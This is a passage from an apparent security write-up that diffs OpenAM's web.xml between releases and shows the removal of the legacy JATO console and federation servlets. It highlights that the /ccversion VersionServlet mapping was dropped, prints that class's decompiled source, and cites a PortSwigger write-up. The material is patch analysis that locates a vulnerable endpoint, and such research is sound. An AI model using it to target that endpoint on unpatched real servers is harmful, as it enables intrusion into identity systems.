- <param-name>exposeHeaders</param-name>
- <param-value>exposeHeaderOne,exposeHeaderTwo</param-value>
- </init-param>
- <init-param>
- <description>
- Maximum Cache Age (Optional):
- The maximum time that the CORS client can cache the pre-flight response, in seconds.
- Default: 600
- </description>
- <param-name>maxAge</param-name>
- <param-value>600</param-value>
- </init-param>
- </filter>
- -->
<filter>
<filter-name>AuditContextFilter</filter-name>
<filter-class>org.forgerock.openam.audit.context.AuditContextFilter</filter-class>
@@ -308,9 +184,9 @@
<url-pattern>/*</url-pattern>
</filter-mapping>
- <!-- Access audit filter for JATO, Debug.jsp and ssoadm.jsp pages -->
+ <!-- Access audit filter for Debug.jsp and ssoadm.jsp pages -->
<filter>
- <filter-name>JatoAuditFilter</filter-name>
+ <filter-name>DebugAuditFilter</filter-name>
<filter-class>org.forgerock.openam.audit.servlet.AuditAccessServletFilter</filter-class>
<init-param>
<param-name>auditing-component</param-name>
@@ -318,36 +194,12 @@
</init-param>
</filter>
<filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/service/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/federation/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/realm/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/agentconfig/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/sts/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/delegation/*</url-pattern>
+ <filter-name>DebugAuditFilter</filter-name>
+ <url-pattern>/Debug.jsp</url-pattern>
</filter-mapping>
<filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/idm/*</url-pattern>
- </filter-mapping>
- <filter-mapping>
- <filter-name>JatoAuditFilter</filter-name>
- <url-pattern>/Debug.jsp</url-pattern>
+ <filter-name>DebugAuditFilter</filter-name>
+ <url-pattern>/Logback.jsp</url-pattern>
</filter-mapping>
<filter>
<filter-name>SsoAdmJspAuditFilter</filter-name>
@@ -366,15 +218,13 @@
<filter-name>amSetupFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
- <!--
<filter-mapping>
- <filter-name>CORSFilter</filter-name>
- <url-pattern>/json/*</url-pattern>
+ <filter-name>FQDNValidationFilter</filter-name>
+ <url-pattern>/XUI/*</url-pattern>
</filter-mapping>
- -->
<filter-mapping>
<filter-name>FQDNValidationFilter</filter-name>
- <url-pattern>/XUI/*</url-pattern>
+ <url-pattern>/ui-admin/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>FQDNValidationFilter</filter-name>
@@ -402,14 +252,23 @@
<filter-name>NoSniffFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
+ <filter-mapping>
+ <filter-name>CachePrivate</filter-name>
+ <url-pattern>/json/*</url-pattern>
+ </filter-mapping>
<filter-mapping>
<filter-name>ResponseValidationFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
+ <!-- The DisableSameSiteCookiesFilter should always come before the SecureCookieFilter -->
<filter-name>DisableSameSiteCookiesFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
+ <filter-mapping>
+ <filter-name>SecureCookieFilter</filter-name>
+ <url-pattern>/*</url-pattern>
+ </filter-mapping>
<filter-mapping>
<filter-name>CacheForFiveMinutes</filter-name>
<url-pattern>/XUI/index.html</url-pattern>
@@ -420,6 +279,10 @@
<url-pattern>/ui-admin/*</url-pattern>
<url-pattern>/XUI/*</url-pattern>
</filter-mapping>
+ <filter-mapping>
+ <filter-name>CacheForFiveMinutes</filter-name>
+ <url-pattern>/ui-admin/index.html</url-pattern>
+ </filter-mapping>
<filter-mapping>
<filter-name>NotificationsWebSocketFilter</filter-name>
<url-pattern>/notifications</url-pattern>
@@ -445,10 +308,6 @@
<!-- listener declaration -->
- <servlet>
- <servlet-name>LoginServlet</servlet-name>
- <servlet-class>com.sun.identity.authentication.UI.LoginServlet</servlet-class>
- </servlet>
<servlet>
<servlet-name>setSetupProgress</servlet-name>
<servlet-class>com.sun.identity.setup.SetSetupProgress</servlet-class>
@@ -528,121 +387,6 @@
<servlet-class>com.sun.identity.configuration.MonitoringFedConfigurator</servlet-class>
<load-on-startup>30</load-on-startup>
</servlet>
- <servlet>
- <description>CDCServlet</description>
- <servlet-name>cdcservlet</servlet-name>
- <servlet-class>com.iplanet.services.cdc.CDCServlet</servlet-class>
- </servlet>
- <servlet>
- <description>SAMLAwareServlet</description>
- <servlet-name>SAMLAwareServlet</servlet-name>
- <servlet-class>com.sun.identity.saml.servlet.SAMLAwareServlet</servlet-class>
- </servlet>
- <servlet>
- <description>SAMLPOSTProfileServlet</description>
- <servlet-name>SAMLPOSTProfileServlet</servlet-name>
- <servlet-class>com.sun.identity.saml.servlet.SAMLPOSTProfileServlet</servlet-class>
- </servlet>
- <servlet>
- <description>SAMLSOAPReceiver</description>
- <servlet-name>SAMLSOAPReceiver</servlet-name>
- <servlet-class>com.sun.identity.saml.servlet.SAMLSOAPReceiver</servlet-class>
- </servlet>
- <servlet>
- <description>AssertionManagerServlet</description>
- <servlet-name>AssertionManagerServlet</servlet-name>
- <servlet-class>com.sun.identity.saml.servlet.AssertionManagerServlet</servlet-class>
- </servlet>
- <servlet>
- <description>FSAssertionManagerServlet</description>
- <servlet-name>FSAssertionManagerServlet</servlet-name>
- <servlet-class>com.sun.identity.federation.services.FSAssertionManagerServlet</servlet-class>
- </servlet>
- <servlet>
- <description>SecurityTokenManagerServlet</description>
- <servlet-name>SecurityTokenManagerServlet</servlet-name>
- <servlet-class>com.sun.identity.liberty.ws.security.SecurityTokenManagerServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>preLoginHandler</servlet-name>
- <servlet-class>com.sun.identity.federation.login.FSPreLoginHandler</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>postLoginHandler</servlet-name>
- <servlet-class>com.sun.identity.federation.login.FSPostLoginHandler</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ProcessLogout</servlet-name>
- <servlet-class>com.sun.identity.federation.services.logout.FSProcessLogoutServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ReturnLogout</servlet-name>
- <servlet-class>com.sun.identity.federation.services.logout.FSReturnLogoutServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>SingleSignOnService</servlet-name>
- <servlet-class>com.sun.identity.federation.services.fednsso.FSSSOAndFedService</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>IntersiteTransferService</servlet-name>
- <servlet-class>com.sun.identity.federation.services.fednsso.FSIntersiteTransferService</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>AssertionConsumerService</servlet-name>
- <servlet-class>com.sun.identity.federation.services.fednsso.FSAssertionConsumerService</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>SOAPReceiver</servlet-name>
- <servlet-class>com.sun.identity.federation.services.FSSOAPReceiver</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>FederationTerminationServlet</servlet-name>
- <servlet-class>com.sun.identity.federation.services.termination.FSTerminationInitiationServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ProcessTermination</servlet-name>
- <servlet-class>com.sun.identity.federation.services.termination.FSTerminationRequestServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ReturnTermination</servlet-name>
- <servlet-class>com.sun.identity.federation.services.termination.FSTerminationReturnServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>InitiateRegistration</servlet-name>
- <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationInitiationServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ProcessRegistration</servlet-name>
- <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationRequestServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>ReturnRegistration</servlet-name>
- <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationReturnServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>LogoutServlet</servlet-name>
- <servlet-class>com.sun.identity.federation.services.logout.FSSingleLogoutServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>WSSOAPReceiver</servlet-name>
- <servlet-class>com.sun.identity.liberty.ws.soapbinding.SOAPReceiver</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>WSPRedirectHandler</servlet-name>
- <servlet-class>com.sun.identity.liberty.ws.interaction.WSPRedirectHandlerServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>IDPFinderService</servlet-name>
- <servlet-class>com.sun.identity.federation.services.fednsso.FSIDPFinderService</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>idffwriter</servlet-name>
- <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>idffreader</servlet-name>
- <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieReaderServlet</servlet-class>
- </servlet>
<servlet>
<servlet-name>saml2writer</servlet-name>
<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
@@ -814,10 +558,6 @@
<servlet-name>LoginLogoutMapping</servlet-name>
<url-pattern>/logout</url-pattern>
</servlet-mapping>
- <servlet-mapping>
- <servlet-name>LoginServlet</servlet-name>
- <url-pattern>/UI/*</url-pattern>
- </servlet-mapping>
<servlet-mapping>
<servlet-name>AMSetupServlet</servlet-name>
<url-pattern>/config/configurator</url-pattern>
@@ -1025,114 +765,6 @@
<servlet-name>spsaehandler</servlet-name>
<url-pattern>/spsaehandler/*</url-pattern>
</servlet-mapping>
- <servlet-mapping>
- <servlet-name>IDPFinderService</servlet-name>
- <url-pattern>/idpfinder</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>cdcservlet</servlet-name>
- <url-pattern>/cdcservlet</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SAMLAwareServlet</servlet-name>
- <url-pattern>/SAMLAwareServlet</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SAMLPOSTProfileServlet</servlet-name>
- <url-pattern>/SAMLPOSTProfileServlet</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SAMLSOAPReceiver</servlet-name>
- <url-pattern>/SAMLSOAPReceiver</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>AssertionManagerServlet</servlet-name>
- <url-pattern>/AssertionManagerServlet/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>FSAssertionManagerServlet</servlet-name>
- <url-pattern>/FSAssertionManagerServlet/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SecurityTokenManagerServlet</servlet-name>
- <url-pattern>/SecurityTokenManagerServlet/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>preLoginHandler</servlet-name>
- <url-pattern>/preLogin</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>postLoginHandler</servlet-name>
- <url-pattern>/postLogin/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ProcessLogout</servlet-name>
- <url-pattern>/ProcessLogout/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ReturnLogout</servlet-name>
- <url-pattern>/ReturnLogout/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>LogoutServlet</servlet-name>
- <url-pattern>/liberty-logout</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SingleSignOnService</servlet-name>
- <url-pattern>/SingleSignOnService/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>IntersiteTransferService</servlet-name>
- <url-pattern>/IntersiteTransferService</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>AssertionConsumerService</servlet-name>
- <url-pattern>/AssertionConsumerService/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SOAPReceiver</servlet-name>
- <url-pattern>/SOAPReceiver/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>FederationTerminationServlet</servlet-name>
- <url-pattern>/federation-terminate</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ProcessTermination</servlet-name>
- <url-pattern>/ProcessTermination/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ReturnTermination</servlet-name>
- <url-pattern>/ReturnTermination/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>InitiateRegistration</servlet-name>
- <url-pattern>/InitiateRegistration</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ProcessRegistration</servlet-name>
- <url-pattern>/ProcessRegistration/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>ReturnRegistration</servlet-name>
- <url-pattern>/ReturnRegistration/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>WSSOAPReceiver</servlet-name>
- <url-pattern>/Liberty/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>WSPRedirectHandler</servlet-name>
- <url-pattern>/WSPRedirectHandler/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>idffwriter</servlet-name>
- <url-pattern>/idffwriter</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>idffreader</servlet-name>
- <url-pattern>/idffreader</url-pattern>
- </servlet-mapping>
<servlet-mapping>
<servlet-name>saml2writer</servlet-name>
<url-pattern>/saml2writer</url-pattern>
@@ -1164,30 +796,6 @@
<!-- end of servlet mapping -->
- <servlet>
- <servlet-name>WebFinger</servlet-name>
- <servlet-class>org.restlet.ext.servlet.ServerServlet</servlet-class>
-
- <!-- Your application class name (Optional - For mode 3) -->
- <init-param>
- <param-name>org.restlet.application</param-name>
- <param-value>org.forgerock.openidconnect.restlet.WebFinger</param-value>
- </init-param>
-
- <!-- List of supported client protocols (Optional - Only in mode 3) -->
- <init-param>
- <param-name>org.restlet.clients</param-name>
- <param-value>RIAP CLAP</param-value>
- </init-param>
-
- <!-- Add the Servlet context path to routes (Optional) -->
- <init-param>
- <param-name>org.restlet.autoWire</param-name>
- <param-value>true</param-value>
- </init-param>
-
- </servlet>
-
<servlet>
<servlet-name>OAuth2RegisterClient</servlet-name>
<jsp-file>/oauth2/registerClient.jsp</jsp-file>
@@ -1200,14 +808,9 @@
<!-- servlet declaration -->
- <servlet-mapping>
- <servlet-name>WebFinger</servlet-name>
- <url-pattern>/.well-known/*</url-pattern>
- </servlet-mapping>
-
<servlet>
<servlet-name>OpenAM</servlet-name>
- <servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class>
+ <servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class>
<init-param>
<param-name>application-loader</param-name>
<param-value>guice</param-value>
@@ -1238,90 +841,22 @@
<servlet-name>OpenAM</servlet-name>
<url-pattern>/sts-tokengen/*</url-pattern>
</servlet-mapping>
-
- <!-- Console -->
- <servlet-mapping>
- <servlet-name>AuthServlet</servlet-name>
- <url-pattern>/authentication/*</url-pattern>
- </servlet-mapping>
<servlet-mapping>
- <servlet-name>AMBaseServlet</servlet-name>
- <url-pattern>/base/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SCServlet</servlet-name>
- <url-pattern>/service/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>SMServlet</servlet-name>
- <url-pattern>/session/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>RMServlet</servlet-name>
- <url-pattern>/realm/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>PMServlet</servlet-name>
- <url-pattern>/policy/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>IDMServlet</servlet-name>
- <url-pattern>/idm/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>UMServlet</servlet-name>
- <url-pattern>/user/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>DelegationServlet</servlet-name>
- <url-pattern>/delegation/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>TaskServlet</servlet-name>
- <url-pattern>/task/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>AgentConfigurationServlet</servlet-name>
- <url-pattern>/agentconfig/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>VersionServlet</servlet-name>
- <url-pattern>/ccversion/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>FSServlet</servlet-name>
- <url-pattern>/federation/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>WSServlet</servlet-name>
- <url-pattern>/webservices/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>STSServlet</servlet-name>
- <url-pattern>/sts/*</url-pattern>
- </servlet-mapping>
- <servlet-mapping>
- <servlet-name>AuditServlet</servlet-name>
- <url-pattern>/audit/*</url-pattern>
- </servlet-mapping>
- <!-- End console -->
-
- <servlet>
- <servlet-name>ForgeRockRest</servlet-name>
- <servlet-class>org.forgerock.openam.rest.RestEndpointServlet</servlet-class>
- </servlet>
- <servlet-mapping>
- <servlet-name>ForgeRockRest</servlet-name>
+ <servlet-name>OpenAM</servlet-name>
<url-pattern>/xacml/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
- <servlet-name>ForgeRockRest</servlet-name>
+ <servlet-name>OpenAM</servlet-name>
<url-pattern>/oauth2/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
- <servlet-name>ForgeRockRest</servlet-name>
+ <servlet-name>OpenAM</servlet-name>
<url-pattern>/uma/*</url-pattern>
</servlet-mapping>
+ <servlet-mapping>
+ <servlet-name>OpenAM</servlet-name>
+ <url-pattern>/.well-known/*</url-pattern>
+ </servlet-mapping>
<!-- Setup favicon.ico extension type -->
<mime-mapping>
@@ -1335,106 +870,6 @@
</welcome-file>
</welcome-file-list>
- <!-- The taglib is only specified once -->
- <jsp-config>
- <taglib>
- <taglib-uri>/WEB-INF/jato.tld</taglib-uri>
- <taglib-location>/WEB-INF/jato.tld</taglib-location>
- </taglib>
- <taglib>
- <taglib-uri>/WEB-INF/cc.tld</taglib-uri>
- <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
- </taglib>
-
- <!-- workarounds for lockart 2.x -->
- <taglib>
- <taglib-uri>/WEB-INF/tld/com_iplanet_jato/jato.tld</taglib-uri>
- <taglib-location>/WEB-INF/jato.tld</taglib-location>
- </taglib>
- <taglib>
- <taglib-uri>/WEB-INF/tld/com_sun_web_ui/cc.tld</taglib-uri>
- <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
- </taglib>
- <!-- taglib definition -->
- </jsp-config>
- <!-- comment it out due to issue 4891 in WAS/JBOSS/Geronimo
- <resource-ref>
- <description>mysql db idrepo</description>
- <res-ref-name>jdbc/openssousersdb</res-ref-name>
- <res-type>javax.sql.DataSource</res-type>
- <res-auth>Container</res-auth>
- <res-sharing-scope>Shareable</res-sharing-scope>
- </resource-ref>
- -->
-
- <!-- Console -->
- <servlet>
- <servlet-name>UMServlet</servlet-name>
- <servlet-class>com.sun.identity.console.user.UMServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>AuthServlet</servlet-name>
- <servlet-class>com.sun.identity.console.authentication.AuthServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>AMBaseServlet</servlet-name>
- <servlet-class>com.sun.identity.console.base.AMBaseServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>SCServlet</servlet-name>
- <servlet-class>com.sun.identity.console.service.SCServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>SMServlet</servlet-name>
- <servlet-class>com.sun.identity.console.session.SMServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>RMServlet</servlet-name>
- <servlet-class>com.sun.identity.console.realm.RMServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>PMServlet</servlet-name>
- <servlet-class>com.sun.identity.console.policy.PMServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>IDMServlet</servlet-name>
- <servlet-class>com.sun.identity.console.idm.IDMServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>DelegationServlet</servlet-name>
- <servlet-class>com.sun.identity.console.delegation.DelegationServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>AgentConfigurationServlet</servlet-name>
- <servlet-class>com.sun.identity.console.agentconfig.AgentConfigurationServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>TaskServlet</servlet-name>
- <servlet-class>com.sun.identity.console.task.TaskServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>VersionServlet</servlet-name>
- <servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>FSServlet</servlet-name>
- <servlet-class>com.sun.identity.console.federation.FSServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>WSServlet</servlet-name>
- <servlet-class>com.sun.identity.console.webservices.WSServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>STSServlet</servlet-name>
- <servlet-class>com.sun.identity.console.sts.STSServlet</servlet-class>
- </servlet>
- <servlet>
- <servlet-name>AuditServlet</servlet-name>
- <servlet-class>com.sun.identity.console.audit.AuditServlet</servlet-class>
- </servlet>
-
- <!-- End console -->
-
<!-- Start errors -->
<error-page>
<error-code>404</error-code>The ccversion endpoint was notably removed:
- <servlet-mapping>
- <servlet-name>VersionServlet</servlet-name>
- <url-pattern>/ccversion/*</url-pattern>
- </servlet-mapping>The original VersionServlet can be seen here:
package WEB-INF.classes.com.sun.identity.console.version;
import com.iplanet.jato.CompleteRequestException;
import com.iplanet.jato.RequestContext;
import com.iplanet.jato.RequestContextImpl;
import com.iplanet.jato.ViewBeanManager;
import com.iplanet.jato.view.ViewBean;
import com.sun.identity.console.base.AMViewBeanBase;
import com.sun.identity.console.version.VersionViewBean;
import com.sun.web.ui.servlet.version.VersionServlet;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
public class VersionServlet
extends VersionServlet
{
protected void initializeRequestContext(RequestContext requestContext) {
super.initializeRequestContext(requestContext);
ViewBeanManager viewBeanManager = new ViewBeanManager(requestContext, getPackageName(com.sun.identity.console.version.VersionServlet.class.getName()));
((RequestContextImpl)requestContext).setViewBeanManager(viewBeanManager);
}
protected void onRequestHandlerNotFound(RequestContext requestContext, String handlerName) throws ServletException {
AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotFound: " + handlerName);
}
protected void onRequestHandlerNotSpecified(RequestContext requestContext) throws ServletException {
AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotSpecified");
}
protected void onUncaughtException(RequestContext requestContext, Exception e) throws ServletException, IOException {
HttpServletRequest httpRequest = requestContext.getRequest();
AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMUncaughtException";
requestContext.getResponse().sendRedirect(redirectUrl);
}
protected void onPageSessionDeserializationException(RequestContext requestContext, ViewBean viewBean, Exception e) throws ServletException, IOException {
HttpServletRequest httpRequest = requestContext.getRequest();
AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL";
requestContext.getResponse().sendRedirect(redirectUrl);
throw new CompleteRequestException();
}
protected void onSessionTimeout(RequestContext requestContext) throws ServletException {}
}More details can be found in the PortSwigger writeup.
